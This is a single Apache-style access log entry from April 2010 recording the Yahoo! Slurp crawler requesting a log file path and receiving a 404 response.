67.195.112.180 - - [28/Apr/2010:14:16:47 -0500] "GET /logs/access_log.1218931200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
